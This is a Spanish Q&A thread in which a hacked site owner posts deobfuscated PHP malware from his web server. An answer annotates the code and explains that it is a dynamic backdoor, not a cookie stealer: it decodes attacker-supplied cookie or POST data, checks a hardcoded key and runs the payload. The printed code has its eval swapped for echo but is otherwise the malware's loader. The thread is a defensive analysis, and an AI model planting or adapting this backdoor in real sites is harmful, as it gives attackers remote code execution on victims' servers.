Intentando entender qué hace este malware PHP [cerrado]

4

Mi servidor ha sido pirateado recientemente y el pirata informático ha cargado varios códigos fuente maliciosos en el servidor web. Ya he desenfocado el código, pero todavía no entiendo lo que hace.

Parece un robo de cookies para los visitantes, pero ¿cuáles son los beneficios para el pirata informático?

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);


$approvals = False;

foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;

    $manager_invitation = $cookie_one;
}

function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

function append_strings($append, $string)
{
    return $append ^ $string;
}

if (!$approvals)
{
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
    }
}

function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);

            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

$approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    switch ($approvals['a']){
        case "i":
            $array = Array();
            $array['pv'] = @phpversion();
            $array['sv'] = '1.0-1';
            echo @serialize($array);
            break;
        case "e":
            // eval($approvals['d']);
            // Remove eval and replace with echo due to security concern
            echo ($approvals['d']);
            break;
    }
    exit();

}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}



function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));

    return make_submission($sub, $sub_meta);
}

function _base64_decode($input)
{
$buffer = "";
$tbl = Array(
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54,
        55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2,
        3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
        20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30,
        31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
        48, 49, 50, 51, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1);

    for ($i = 0; $i < strlen($input); ) {
        $b = 0;
        if ($tbl[ord($input[$i])] != -1) {
            $b = ($tbl[ord($input[$i])] & 0xFF) << 18;
        }
        else {
            $i++;
            continue;
        }

        $num = 0;
        if ($i + 1 < strlen($input) && $tbl[ord($input[$i+1])] != -1) {
            $b = $b | (($tbl[ord($input[$i+1])] & 0xFF) << 12);
            $num++;
        }

        if ($i + 2 < strlen($input) && $tbl[ord($input[$i+2])] != -1) {
            $b = $b | (($tbl[ord($input[$i+2])] & 0xFF) << 6);
            $num++;
        }

        if ($i + 3 < strlen($input) && $tbl[ord($input[$i+3])] != -1) {
            $b = $b | ($tbl[ord($input[$i+3])] & 0xFF);
            $num++;
        }

        while ($num > 0) {
            $c = ($b & 0xFF0000) >> 16;
            $buffer .=chr($c);
            $b <<= 8;
            $num--;
        }
        $i += 4;
    }
    return $buffer;

}

    
pregunta cww 20.04.2018 - 12:03
fuente

1 respuesta

2

Personalmente he encontrado este código recientemente. Intentaré escribir lo que recuerdo y actualizarlo cuando las cosas vuelvan a mi mente. Agregaré el código y escribiré los comentarios a medida que avance.

//Turn off logging so that any errors don't catch peoples attention
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);

//Set execution time low so that any endless loops don't catch peoples attention
@ini_set('max_execution_time', 0);
@set_time_limit(0);

//Set the key variable of the malware to false to trigger the decryption of the cookie
$approvals = False;

//_COOKIE contains name value pairs, this loops through them. cookie_one gets the name, cookie_two gets the value. So the last entry is going to end up in $approvals and $manager_invitation.
foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;
    $manager_invitation = $cookie_one;
}

//Obfuscated text basically. Running echo improve_meta(); will return the value of this function. You my find it needs another string added to it and then decoded again to get a meaningful string value. Note "append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')" is typically called with this function. 
function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

//This function does not append strings, it XOR's them. Its simple to see the output of this function by using echo on the result.
function append_strings($append, $string)
{
    return $append ^ $string;
}

//If approvals is blank, most likely because not cookie was found. Loop through the POST parameters.     
if (!$approvals)
{
    //The last entry is going to end up in $approvals and $manager_invitation.
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
    }
}

//TODO: Not sure about this one
function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);

            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

$approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

//If approvals.ak has been set with a value, and that value matches the key for this malware. Aren't they nice, making sure only they can access your systems?
if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    //Approvals.a is the type of action to perform. "i" reports what the system has running on it. 
    //PV is the phpversion of the system, while sv is the malware version. 
    switch ($approvals['a']){
    case "i":
        $array = Array();
        $array['pv'] = @phpversion();
        $array['sv'] = '1.0-1';
        echo @serialize($array);
        break;

    //If "e" is present we end up here. This is where all hell breaks loose. Once all decoding has occurred, what has ended up in approvals.d is simply run.
    //Note that approvals comes from either COOKIE or POST params. So this could be anything. 
    //Think of it as a dynamic backdoor, and all that is present on the affected system is the bootloader. 
    case "e":
        // eval($approvals['d']);
        // Remove eval and replace with echo due to security concern
        echo ($approvals['d']);
        break;
    }
    exit();
}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}

function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));
    return make_submission($sub, $sub_meta);
}

//Don't think this is base64 encoding, from memory this was a red herring. It is an decoder though. 
function _base64_decode($input)
{
}

En resumen, no está intentando robar cookies, sino que va a ejecutar el código almacenado en las cookies. Es una puerta trasera dinámica por lo que pude ver. Es increíblemente peligroso tenerlo disponible en tu sitio web.

    
respondido por el Jason 19.09.2018 - 15:58
fuente

Lea otras preguntas en las etiquetas